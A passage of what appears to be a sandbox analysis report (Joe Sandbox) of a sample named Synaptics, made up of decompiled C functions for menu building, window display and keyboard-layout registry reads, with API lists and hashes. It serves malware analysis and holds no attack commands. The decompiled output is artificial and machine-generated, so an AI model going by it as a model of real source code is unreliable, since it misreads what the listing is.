                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								E0041024C(__ecx);
                                                                                                                                                                                                                            								goto L46;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_v13 = E00416328(_v12, 2);
                                                                                                                                                                                                                            							goto L46;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_v13 = E00416314(0, 1);
                                                                                                                                                                                                                            						goto L46;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(_t338 != 0) {
                                                                                                                                                                                                                            						if(_t338 != 1) {
                                                                                                                                                                                                                            							if(E0041713C( *_v8,  &_v28) != 0) {
                                                                                                                                                                                                                            								_push( &_v16);
                                                                                                                                                                                                                            								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
                                                                                                                                                                                                                            									_push( &_v44);
                                                                                                                                                                                                                            									L0040F318();
                                                                                                                                                                                                                            									_push(_t346);
                                                                                                                                                                                                                            									_push(0x41686d);
                                                                                                                                                                                                                            									_push( *[fs:eax]);
                                                                                                                                                                                                                            									 *[fs:eax] = _t349;
                                                                                                                                                                                                                            									_t284 =  *_t256 & 0x0000ffff;
                                                                                                                                                                                                                            									E00411330( &_v44,  *_t256 & 0x0000ffff, _v8, __edi, __fp0);
                                                                                                                                                                                                                            									if((_v44 & 0x00000fff) !=  *_t256) {
                                                                                                                                                                                                                            										E0041015C(_t284);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_v13 = E00416548(_t256, _v12,  &_v44, _t353);
                                                                                                                                                                                                                            									_pop(_t325);
                                                                                                                                                                                                                            									 *[fs:eax] = _t325;
                                                                                                                                                                                                                            									_push(E00416AE8);
                                                                                                                                                                                                                            									return E004109E8( &_v44);
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									if( *_t256 == _v16) {
                                                                                                                                                                                                                            										_t38 = ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c; // 0xc3ffff94
                                                                                                                                                                                                                            										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + _t38));
                                                                                                                                                                                                                            										goto L46;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										_push( &_v44);
                                                                                                                                                                                                                            										L0040F318();
                                                                                                                                                                                                                            										_push(_t346);
                                                                                                                                                                                                                            										_push(0x4167df);
                                                                                                                                                                                                                            										_push( *[fs:eax]);
                                                                                                                                                                                                                            										 *[fs:eax] = _t349;
                                                                                                                                                                                                                            										_t289 = _v16 & 0x0000ffff;
                                                                                                                                                                                                                            										E00411330( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
                                                                                                                                                                                                                            										if((_v44 & 0x00000fff) != _v16) {
                                                                                                                                                                                                                            											E0041015C(_t289);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_t27 = ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c; // 0xc3ffff94
                                                                                                                                                                                                                            										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + _t27));
                                                                                                                                                                                                                            										_pop(_t333);
                                                                                                                                                                                                                            										 *[fs:eax] = _t333;
                                                                                                                                                                                                                            										_push(E00416AE8);
                                                                                                                                                                                                                            										return E004109E8( &_v44);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								E0041024C(__ecx);
                                                                                                                                                                                                                            								goto L46;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_v13 = E00416328(_v12, 0);
                                                                                                                                                                                                                            							goto L46;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_v13 = E00416314(1, 0);
                                                                                                                                                                                                                            						L46:
                                                                                                                                                                                                                            						return _v13;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            0x0041681b
                                                                                                                                                                                                                            0x0041681c
                                                                                                                                                                                                                            0x00416821
                                                                                                                                                                                                                            0x00416824
                                                                                                                                                                                                                            0x00416827
                                                                                                                                                                                                                            0x00416830
                                                                                                                                                                                                                            0x00416840
                                                                                                                                                                                                                            0x00416842
                                                                                                                                                                                                                            0x00416842
                                                                                                                                                                                                                            0x00416854
                                                                                                                                                                                                                            0x00416859
                                                                                                                                                                                                                            0x0041685c
                                                                                                                                                                                                                            0x0041685f
                                                                                                                                                                                                                            0x0041686c
                                                                                                                                                                                                                            0x00416762
                                                                                                                                                                                                                            0x00416769
                                                                                                                                                                                                                            0x00416804
                                                                                                                                                                                                                            0x00416808
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0041676b
                                                                                                                                                                                                                            0x0041676e
                                                                                                                                                                                                                            0x0041676f
                                                                                                                                                                                                                            0x00416776
                                                                                                                                                                                                                            0x00416777
                                                                                                                                                                                                                            0x0041677c
                                                                                                                                                                                                                            0x0041677f
                                                                                                                                                                                                                            0x00416782
                                                                                                                                                                                                                            0x0041678b
                                                                                                                                                                                                                            0x0041679c
                                                                                                                                                                                                                            0x0041679e
                                                                                                                                                                                                                            0x0041679e
                                                                                                                                                                                                                            0x004167c2
                                                                                                                                                                                                                            0x004167c6
                                                                                                                                                                                                                            0x004167cb
                                                                                                                                                                                                                            0x004167ce
                                                                                                                                                                                                                            0x004167d1
                                                                                                                                                                                                                            0x004167de
                                                                                                                                                                                                                            0x004167de
                                                                                                                                                                                                                            0x00416769
                                                                                                                                                                                                                            0x0041673d
                                                                                                                                                                                                                            0x0041673d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0041673d
                                                                                                                                                                                                                            0x00416717
                                                                                                                                                                                                                            0x00416723
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00416723
                                                                                                                                                                                                                            0x00416700
                                                                                                                                                                                                                            0x00416709
                                                                                                                                                                                                                            0x00416ae8
                                                                                                                                                                                                                            0x00416af0
                                                                                                                                                                                                                            0x00416af0
                                                                                                                                                                                                                            0x004166fe

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: XkA
                                                                                                                                                                                                                            • API String ID: 0-440165744
                                                                                                                                                                                                                            • Opcode ID: 33095617600c0f76cb91287695ca0870e369363d944ea869185c57052bf95faf
                                                                                                                                                                                                                            • Instruction ID: 126fbda12782d38e062267a272fec00c664f0fd244103826fb372783f4e2cac9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33095617600c0f76cb91287695ca0870e369363d944ea869185c57052bf95faf
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0D18339A00149AFCF00EF94C4819EEBBB5EF49314F5544AAE840B7355D638EEC6CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                            			E0044A960(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v13;
                                                                                                                                                                                                                            				struct tagMENUITEMINFOA _v61;
                                                                                                                                                                                                                            				char _v68;
                                                                                                                                                                                                                            				intOrPtr _t103;
                                                                                                                                                                                                                            				CHAR* _t109;
                                                                                                                                                                                                                            				char _t115;
                                                                                                                                                                                                                            				short _t149;
                                                                                                                                                                                                                            				void* _t154;
                                                                                                                                                                                                                            				intOrPtr _t161;
                                                                                                                                                                                                                            				intOrPtr _t184;
                                                                                                                                                                                                                            				struct HMENU__* _t186;
                                                                                                                                                                                                                            				int _t190;
                                                                                                                                                                                                                            				void* _t192;
                                                                                                                                                                                                                            				intOrPtr _t193;
                                                                                                                                                                                                                            				void* _t196;
                                                                                                                                                                                                                            				void* _t205;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t155 = __ecx;
                                                                                                                                                                                                                            				_v68 = 0;
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				_v5 = __ecx;
                                                                                                                                                                                                                            				_t186 = __edx;
                                                                                                                                                                                                                            				_t154 = __eax;
                                                                                                                                                                                                                            				_push(_t196);
                                                                                                                                                                                                                            				_push(0x44abbb);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t196 + 0xffffffc0;
                                                                                                                                                                                                                            				if( *((char*)(__eax + 0x3e)) == 0) {
                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                            					_pop(_t161);
                                                                                                                                                                                                                            					 *[fs:eax] = _t161;
                                                                                                                                                                                                                            					_push(0x44abc2);
                                                                                                                                                                                                                            					E004049C0( &_v68);
                                                                                                                                                                                                                            					return E004049C0( &_v12);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00404A58( &_v12,  *((intOrPtr*)(__eax + 0x30)));
                                                                                                                                                                                                                            				if(E0044C8DC(_t154) <= 0) {
                                                                                                                                                                                                                            					__eflags =  *((short*)(_t154 + 0x60));
                                                                                                                                                                                                                            					if( *((short*)(_t154 + 0x60)) == 0) {
                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                            						if((GetVersion() & 0x000000ff) < 4) {
                                                                                                                                                                                                                            							_t190 =  *(0x49bdf0 + ((E00404DCC( *((intOrPtr*)(_t154 + 0x30)), 0x44abe0) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0049BDE4 |  *0x0049BDD4 |  *0x0049BDDC | 0x00000400;
                                                                                                                                                                                                                            							_t103 = E0044C8DC(_t154);
                                                                                                                                                                                                                            							__eflags = _t103;
                                                                                                                                                                                                                            							if(_t103 <= 0) {
                                                                                                                                                                                                                            								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E00404E80(_v12));
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t109 = E00404E80( *((intOrPtr*)(_t154 + 0x30)));
                                                                                                                                                                                                                            								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0044AE70(_t154), _t109);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L22;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_v61.cbSize = 0x2c;
                                                                                                                                                                                                                            						_v61.fMask = 0x3f;
                                                                                                                                                                                                                            						_t192 = E0044CE98(_t154);
                                                                                                                                                                                                                            						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E0044C4B4(_t154) == 0) {
                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
                                                                                                                                                                                                                            								L14:
                                                                                                                                                                                                                            								_t115 = 0;
                                                                                                                                                                                                                            								goto L16;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
                                                                                                                                                                                                                            							if(_t205 == 0) {
                                                                                                                                                                                                                            								goto L15;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							L15:
                                                                                                                                                                                                                            							_t115 = 1;
                                                                                                                                                                                                                            							L16:
                                                                                                                                                                                                                            							_v13 = _t115;
                                                                                                                                                                                                                            							_v61.fType =  *(0x49be24 + ((E00404DCC( *((intOrPtr*)(_t154 + 0x30)), 0x44abe0) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x0049BE1C |  *0x0049BDF8 |  *0x0049BE2C |  *0x0049BE34;
                                                                                                                                                                                                                            							_v61.fState =  *0x0049BE04 |  *0x0049BE14 |  *0x0049BE0C;
                                                                                                                                                                                                                            							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
                                                                                                                                                                                                                            							_v61.hSubMenu = 0;
                                                                                                                                                                                                                            							_v61.hbmpChecked = 0;
                                                                                                                                                                                                                            							_v61.hbmpUnchecked = 0;
                                                                                                                                                                                                                            							_v61.dwTypeData = E00404E80(_v12);
                                                                                                                                                                                                                            							if(E0044C8DC(_t154) > 0) {
                                                                                                                                                                                                                            								_v61.hSubMenu = E0044AE70(_t154);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
                                                                                                                                                                                                                            							goto L22;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t193 =  *((intOrPtr*)(_t154 + 0x64));
                                                                                                                                                                                                                            					__eflags = _t193;
                                                                                                                                                                                                                            					if(_t193 == 0) {
                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                            						_push(_v12);
                                                                                                                                                                                                                            						_push(0x44abd4);
                                                                                                                                                                                                                            						E00449FC4( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
                                                                                                                                                                                                                            						_push(_v68);
                                                                                                                                                                                                                            						E00404D40();
                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags =  *((intOrPtr*)(_t193 + 0x64));
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t184 =  *0x449854; // 0x4498a0
                                                                                                                                                                                                                            					_t149 = E00403D78( *((intOrPtr*)(_t193 + 4)), _t184);
                                                                                                                                                                                                                            					__eflags = _t149;
                                                                                                                                                                                                                            					if(_t149 != 0) {
                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v61.hSubMenu = E0044AE70(_t154);
                                                                                                                                                                                                                            				goto L8;
                                                                                                                                                                                                                            			}





















                                                                                                                                                                                                                            0x0044a9c0
                                                                                                                                                                                                                            0x0044a9c4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044a9c9
                                                                                                                                                                                                                            0x0044a9cf
                                                                                                                                                                                                                            0x0044a9d4
                                                                                                                                                                                                                            0x0044a9d6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044a9d6
                                                                                                                                                                                                                            0x0044a9ad
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0044AB0C
                                                                                                                                                                                                                            • GetVersion.KERNEL32(00000000,0044ABBB), ref: 0044A9FC
                                                                                                                                                                                                                              • Part of subcall function 0044AE70: CreatePopupMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE8B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$CreateInsertItemPopupVersion
                                                                                                                                                                                                                            • String ID: ,$?
                                                                                                                                                                                                                            • API String ID: 133695497-2308483597
                                                                                                                                                                                                                            • Opcode ID: 496e766476e5cbb51b460a7aff5d95828f717add555cf79c0a8667af29b108e5
                                                                                                                                                                                                                            • Instruction ID: 398804152d519dd2ee62b9937964e6d4d0d5c4b5bb315d29c079f0e0da2fd4ec
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 496e766476e5cbb51b460a7aff5d95828f717add555cf79c0a8667af29b108e5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4861E270A042449BEB10EF79D881A9A77FAFF09304F04457AEA44E7356E738EC55C749
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 69%
                                                                                                                                                                                                                            			E00442BD0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				void _v12;
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				int _v24;
                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                            				intOrPtr* _t80;
                                                                                                                                                                                                                            				intOrPtr _t91;
                                                                                                                                                                                                                            				void* _t119;
                                                                                                                                                                                                                            				intOrPtr _t136;
                                                                                                                                                                                                                            				intOrPtr _t145;
                                                                                                                                                                                                                            				void* _t148;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				asm("movsd");
                                                                                                                                                                                                                            				asm("movsd");
                                                                                                                                                                                                                            				asm("movsd");
                                                                                                                                                                                                                            				asm("movsd");
                                                                                                                                                                                                                            				_t119 = __ecx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t145 =  *0x49de0c; // 0x49ebbc
                                                                                                                                                                                                                            				 *((char*)(_v8 + 0x210)) = 1;
                                                                                                                                                                                                                            				_push(_t148);
                                                                                                                                                                                                                            				_push(0x442da9);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t148 + 0xffffffe0;
                                                                                                                                                                                                                            				E0043AFAC(_v8, __ecx, __ecx, _t145);
                                                                                                                                                                                                                            				_v16 = _v16 + 4;
                                                                                                                                                                                                                            				E0043C1D4(_v8,  &_v28);
                                                                                                                                                                                                                            				if(E00458218() <  *(_v8 + 0x4c) + _v24) {
                                                                                                                                                                                                                            					_v24 = E00458218() -  *(_v8 + 0x4c);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(E00458224() <  *(_v8 + 0x48) + _v28) {
                                                                                                                                                                                                                            					_v28 = E00458224() -  *(_v8 + 0x48);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(E0045820C() > _v28) {
                                                                                                                                                                                                                            					_v28 = E0045820C();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(E00458200() > _v16) {
                                                                                                                                                                                                                            					_v16 = E00458200();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				SetWindowPos(E00441704(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
                                                                                                                                                                                                                            				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E00404C80(_t119) < 0x64 &&  *0x49bc1c != 0) {
                                                                                                                                                                                                                            					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                            						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
                                                                                                                                                                                                                            						if(_v12 == 0) {
                                                                                                                                                                                                                            							E00445E24( &_v36);
                                                                                                                                                                                                                            							if(_v32 <= _v24) {
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						 *0x49bc1c(E00441704(_v8), "true",  *0x0049BD24 | 0x00040000);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t80 =  *0x49dbcc; // 0x49ebb8
                                                                                                                                                                                                                            				_t45 =  *_t80 + 0x30; // 0x70374
                                                                                                                                                                                                                            				E0043EE38(_v8,  *_t45);
                                                                                                                                                                                                                            				ShowWindow(E00441704(_v8), "true");
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_v8 + 0x7c))();
                                                                                                                                                                                                                            				_pop(_t136);
                                                                                                                                                                                                                            				 *[fs:eax] = _t136;
                                                                                                                                                                                                                            				_push(0x442db0);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
                                                                                                                                                                                                                            				_t91 = _v8;
                                                                                                                                                                                                                            				 *((char*)(_t91 + 0x210)) = 0;
                                                                                                                                                                                                                            				return _t91;
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            0x00442c79
                                                                                                                                                                                                                            0x00442c86
                                                                                                                                                                                                                            0x00442c8f
                                                                                                                                                                                                                            0x00442c8f
                                                                                                                                                                                                                            0x00442cb5
                                                                                                                                                                                                                            0x00442ccd
                                                                                                                                                                                                                            0x00442cf5
                                                                                                                                                                                                                            0x00442cfe
                                                                                                                                                                                                                            0x00442d0d
                                                                                                                                                                                                                            0x00442d16
                                                                                                                                                                                                                            0x00442d24
                                                                                                                                                                                                                            0x00442d2f
                                                                                                                                                                                                                            0x00442d2f
                                                                                                                                                                                                                            0x00442d2f
                                                                                                                                                                                                                            0x00442d53
                                                                                                                                                                                                                            0x00442d53
                                                                                                                                                                                                                            0x00442cfe
                                                                                                                                                                                                                            0x00442d59
                                                                                                                                                                                                                            0x00442d60
                                                                                                                                                                                                                            0x00442d66
                                                                                                                                                                                                                            0x00442d76
                                                                                                                                                                                                                            0x00442d80
                                                                                                                                                                                                                            0x00442d85
                                                                                                                                                                                                                            0x00442d88
                                                                                                                                                                                                                            0x00442d8b
                                                                                                                                                                                                                            0x00442d98
                                                                                                                                                                                                                            0x00442d9e
                                                                                                                                                                                                                            0x00442da1
                                                                                                                                                                                                                            0x00442da8

APIs
• SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,00442DA9), ref: 00442CB5
• GetTickCount.KERNEL32 ref: 00442CBA
• SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 00442CF5
• SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 00442D0D
• AnimateWindow.USER32(00000000,?,00000001), ref: 00442D53
• ShowWindow.USER32(00000000,?,00000000,000000FF,?,?,?,?,00000010,00000000,00442DA9), ref: 00442D76
  • Part of subcall function 00445E24: GetCursorPos.USER32(?), ref: 00445E28
• GetTickCount.KERNEL32 ref: 00442D90
Memory Dump Source
• Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
Yara matches
Similarity
• API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
• String ID:
• API String ID: 3024527889-0
• Opcode ID: 54a305cc09a56bb811332e01a25417af1ec60ed1c2f6bf35ac9e9272792253b9
• Instruction ID: ec947e6fb4e605e95c0b99b07f50ee8800e03fd8639e7176e4c102910f3e7fae
• Opcode Fuzzy Hash: 54a305cc09a56bb811332e01a25417af1ec60ed1c2f6bf35ac9e9272792253b9
• Instruction Fuzzy Hash: 1F513D74A00109DFEB10DF99C986E9EB7F5AF04304F6045AAF500EB395DB78AE40DB99
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                            			E00458464(intOrPtr __eax, void* __ebx, void* __fp0) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                            				struct HKL__* _v280;
                                                                                                                                                                                                                            				char _v536;
                                                                                                                                                                                                                            				char _v600;
                                                                                                                                                                                                                            				char _v604;
                                                                                                                                                                                                                            				char _v608;
                                                                                                                                                                                                                            				char _v612;
                                                                                                                                                                                                                            				void* _t60;
                                                                                                                                                                                                                            				intOrPtr _t106;
                                                                                                                                                                                                                            				intOrPtr _t111;
                                                                                                                                                                                                                            				void* _t117;
                                                                                                                                                                                                                            				void* _t118;
                                                                                                                                                                                                                            				intOrPtr _t119;
                                                                                                                                                                                                                            				void* _t129;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t129 = __fp0;
                                                                                                                                                                                                                            				_t117 = _t118;
                                                                                                                                                                                                                            				_t119 = _t118 + 0xfffffda0;
                                                                                                                                                                                                                            				_v612 = 0;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_push(_t117);
                                                                                                                                                                                                                            				_push(0x45860f);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t119;
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                            					_pop(_t106);
                                                                                                                                                                                                                            					 *[fs:eax] = _t106;
                                                                                                                                                                                                                            					_push(0x458616);
                                                                                                                                                                                                                            					return E004049C0( &_v612);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *((intOrPtr*)(_v8 + 0x34)) = E00403BBC(1);
                                                                                                                                                                                                                            					E004049C0(_v8 + 0x38);
                                                                                                                                                                                                                            					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
                                                                                                                                                                                                                            					if(_t60 < 0) {
                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                            						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
                                                                                                                                                                                                                            						E0041D5D8( *((intOrPtr*)(_v8 + 0x34)), 1);
                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_v20 = _t60 + 1;
                                                                                                                                                                                                                            						_v24 =  &_v280;
                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                            							if(E00446294( *_v24) == 0) {
                                                                                                                                                                                                                            								goto L9;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_v608 =  *_v24;
                                                                                                                                                                                                                            								_v604 = 0;
                                                                                                                                                                                                                            								if(RegOpenKeyExA(0x80000002, E0040A5E4( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
                                                                                                                                                                                                                            									goto L9;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_push(_t117);
                                                                                                                                                                                                                            									_push(0x4585cb);
                                                                                                                                                                                                                            									_push( *[fs:eax]);
                                                                                                                                                                                                                            									 *[fs:eax] = _t119;
                                                                                                                                                                                                                            									_v12 = 0x100;
                                                                                                                                                                                                                            									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
                                                                                                                                                                                                                            										E00404C30( &_v612, 0x100,  &_v536);
                                                                                                                                                                                                                            										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
                                                                                                                                                                                                                            										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
                                                                                                                                                                                                                            											E00404C30(_v8 + 0x38, 0x100,  &_v536);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_pop(_t111);
                                                                                                                                                                                                                            									 *[fs:eax] = _t111;
                                                                                                                                                                                                                            									_push(0x4585d2);
                                                                                                                                                                                                                            									return RegCloseKey(_v16);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                            							_v24 = _v24 + 4;
                                                                                                                                                                                                                            							_t38 =  &_v20;
                                                                                                                                                                                                                            							 *_t38 = _v20 - 1;
                                                                                                                                                                                                                            						} while ( *_t38 != 0);
                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L12:
                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                            APIs
